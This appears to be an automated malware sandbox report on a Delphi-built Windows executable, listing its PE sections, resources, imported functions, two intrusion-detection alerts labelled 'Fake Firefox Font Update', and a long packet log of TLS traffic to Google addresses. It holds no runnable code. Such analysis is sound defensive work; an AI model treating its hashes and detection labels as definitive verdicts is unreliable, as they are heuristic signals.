                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                .text | 0x1000 | 0x6ef7c | 0x6f000 | 6a83eb4845c280b8a395ea67cf0eaaec | False | 0.5238422015765766 | data | 6.530963238622684 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .itext | 0x70000 | 0x7c4 | 0x800 | 8c84de7ddc650e8b4731f318bcd09386 | False | 0.6103515625 | data | 6.080503925923311 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .data | 0x71000 | 0x1e18 | 0x2000 | ecb5efb5690f584dd9bcae579b1082b9 | False | 0.387451171875 | data | 3.7569307685335174 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .bss | 0x73000 | 0x49b8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata | 0x78000 | 0x2b9e | 0x2c00 | 3645f186dbb107a814e6f7788eda8aa6 | False | 0.3164950284090909 | data | 5.198465793856343 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .tls | 0x7b000 | 0x34 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata | 0x7c000 | 0x18 | 0x200 | d510f38b6ed52130ca157449bd04a150 | False | 0.05078125 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc | 0x7d000 | 0x7978 | 0x7a00 | 947fd0f5692db3c8d44f889b13b61cf6 | False | 0.6156826331967213 | data | 6.671169499572467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                .rsrc | 0x85000 | 0xf8200 | 0xf8200 | e6034154538d55075dea85c7ceeb6f60 | False | 0.5909083753148615 | data | 6.999795247535367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                RT_CURSOR | 0x85ec8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
                                                                RT_CURSOR | 0x85ffc | 0x134 | data | English | United States | 0.4642857142857143
                                                                RT_CURSOR | 0x86130 | 0x134 | data | English | United States | 0.4805194805194805
                                                                RT_CURSOR | 0x86264 | 0x134 | data | English | United States | 0.38311688311688313
                                                                RT_CURSOR | 0x86398 | 0x134 | data | English | United States | 0.36038961038961037
                                                                RT_CURSOR | 0x864cc | 0x134 | data | English | United States | 0.4090909090909091
                                                                RT_CURSOR | 0x86600 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
                                                                RT_BITMAP | 0x86734 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                                                                RT_BITMAP | 0x86904 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | English | United States | 0.46487603305785125
                                                                RT_BITMAP | 0x86ae8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.43103448275862066
                                                                RT_BITMAP | 0x86cb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39870689655172414
                                                                RT_BITMAP | 0x86e88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.4245689655172414
                                                                RT_BITMAP | 0x87058 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5021551724137931
                                                                RT_BITMAP | 0x87228 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5064655172413793
                                                                RT_BITMAP | 0x873f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                                                                RT_BITMAP | 0x875c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.5344827586206896
                                                                RT_BITMAP | 0x87798 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | English | United States | 0.39655172413793105
                                                                RT_BITMAP | 0x87968 | 0x9c6e8 | Device independent bitmap graphic, 1002 x 213 x 24, image size 640704 | English | United States | 0.45959540783838787
                                                                RT_BITMAP | 0x124050 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5208333333333334
                                                                RT_BITMAP | 0x124110 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42857142857142855
                                                                RT_BITMAP | 0x1241f0 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.4955357142857143
                                                                RT_BITMAP | 0x1242d0 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.38392857142857145
                                                                RT_BITMAP | 0x1243b0 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4947916666666667
                                                                RT_BITMAP | 0x124470 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.484375
                                                                RT_BITMAP | 0x124530 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.42410714285714285
                                                                RT_BITMAP | 0x124610 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.5104166666666666
                                                                RT_BITMAP | 0x1246d0 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.5
                                                                RT_BITMAP | 0x1247b0 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.4870689655172414
                                                                RT_BITMAP | 0x124898 | 0xc0 | Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors | English | United States | 0.4895833333333333
                                                                RT_BITMAP | 0x124958 | 0xe0 | Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors | English | United States | 0.3794642857142857
                                                                RT_ICON | 0x124a38 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 1889 x 1889 px/m | | | 0.2969858156028369
                                                                RT_ICON | 0x124ea0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 1889 x 1889 px/m | | | 0.20040983606557378
                                                                RT_ICON | 0x125828 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 1889 x 1889 px/m | | | 0.14681050656660413
                                                                RT_ICON | 0x1268d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 1889 x 1889 px/m | | | 0.10394190871369295
                                                                RT_ICON | 0x128e78 | 0x1249 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9374065370647298
                                                                RT_DIALOG | 0x12a0c4 | 0x52 | data | | | 0.7682926829268293
                                                                RT_DIALOG | 0x12a118 | 0x52 | data | | | 0.7560975609756098
                                                                RT_STRING | 0x12a16c | 0x34 | data | | | 0.5
                                                                RT_STRING | 0x12a1a0 | 0x2fc | data | | | 0.4463350785340314
                                                                RT_STRING | 0x12a49c | 0xa8 | data | | | 0.7202380952380952
                                                                RT_STRING | 0x12a544 | 0x15c | data | | | 0.5545977011494253
                                                                RT_STRING | 0x12a6a0 | 0x148 | data | | | 0.5701219512195121
                                                                RT_STRING | 0x12a7e8 | 0x478 | data | | | 0.38636363636363635
                                                                RT_STRING | 0x12ac60 | 0x35c | data | | | 0.40232558139534885
                                                                RT_STRING | 0x12afbc | 0x3b8 | data | | | 0.39705882352941174
                                                                RT_STRING | 0x12b374 | 0x3e8 | data | | | 0.349
                                                                RT_STRING | 0x12b75c | 0x214 | data | | | 0.49624060150375937
                                                                RT_STRING | 0x12b970 | 0xcc | data | | | 0.6274509803921569
                                                                RT_STRING | 0x12ba3c | 0x194 | data | | | 0.5643564356435643
                                                                RT_STRING | 0x12bbd0 | 0x3c4 | data | | | 0.3288381742738589
                                                                RT_STRING | 0x12bf94 | 0x338 | data | | | 0.42961165048543687
                                                                RT_STRING | 0x12c2cc | 0x294 | data | | | 0.42424242424242425
                                                                RT_RCDATA | 0x12c560 | 0x10 | data | | | 1.5
                                                                RT_RCDATA | 0x12c570 | 0x318 | data | | | 0.6982323232323232
                                                                RT_RCDATA | 0x12c888 | 0x5078e | GIF image data, version 89a, 280 x 280 | English | United States | 0.881148858968369
                                                                RT_RCDATA0x17d0180x107Delphi compiled form 'TForm1'0.8098859315589354
                                                                RT_GROUP_CURSOR0x17d1200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                RT_GROUP_CURSOR0x17d1340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                RT_GROUP_CURSOR0x17d1480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x17d15c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x17d1700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x17d1840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_CURSOR0x17d1980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                RT_GROUP_ICON0x17d1ac0x4cdata0.8289473684210527
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CreateFileA, CloseHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterHotKey, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterHotKey, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFileTime, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileTime, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder, SHBrowseForFolderA
comdlg32.dll | GetOpenFileNameA
kernel32.dll | MulDiv
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T11:28:42.529127+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.11 | 49705 | 172.217.19.238 | 443 | TCP
2024-12-24T11:28:45.321881+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.11 | 49707 | 142.250.181.1 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Dec 24, 2024 11:28:49.206345081 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.210994959 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.211040020 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.211049080 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.216166973 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.216212988 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.216644049 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.220325947 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.220388889 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.220397949 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.225317001 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.225378990 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.225388050 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.230554104 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.230596066 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.230603933 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.235754013 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.235790014 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.235800028 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.241154909 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.241221905 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.241239071 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.245681047 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.245727062 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.245735884 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.250941038 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.250987053 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.250994921 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.255776882 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.255825043 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.255832911 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.260637045 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.260683060 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.260693073 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.265619993 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.265662909 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.265671968 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.270453930 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.270498037 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.270505905 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.275232077 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.275274992 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.275285006 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.280055046 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.280114889 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.280122995 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.284661055 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.284702063 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.284712076 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.289515018 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.289565086 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.289572954 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.294055939 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.294117928 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.294126034 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.298644066 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.298702002 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.298711061 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.303319931 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.303380966 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.303390026 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.308288097 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.308355093 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.308362961 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.312236071 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.312283993 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.312298059 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.316906929 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.316951990 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.316961050 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.321230888 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.321284056 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.321291924 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.326029062 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.326081991 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.326092005 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.330017090 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.330055952 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.330068111 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.330081940 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.330121040 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.334824085 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.338435888 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.338480949 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.338491917 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.344352961 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.344412088 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.344423056 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.347011089 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.347054958 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.347058058 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.347069025 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.347107887 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.352005959 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.355086088 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.355123043 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.355138063 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.355149984 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.355194092 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.361680984 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.365396976 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.365434885 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.365456104 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.365468025 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.365509987 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.369188070 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.371181965 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.371222973 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.371232033 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.376044035 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.376090050 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.376107931 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.376117945 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.376166105 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.378570080 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.382186890 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.382229090 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.382239103 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.385932922 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.385972023 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.385984898 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.385993958 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.386034012 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.389657021 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.393126965 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.393191099 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.393201113 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.396320105 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.396372080 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.396382093 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.399653912 CET44349707142.250.181.1192.168.2.11
                                                                Dec 24, 2024 11:28:49.399705887 CET49707443192.168.2.11142.250.181.1
                                                                Dec 24, 2024 11:28:49.399709940 CET44349707142.250.181.1192.168.2.11
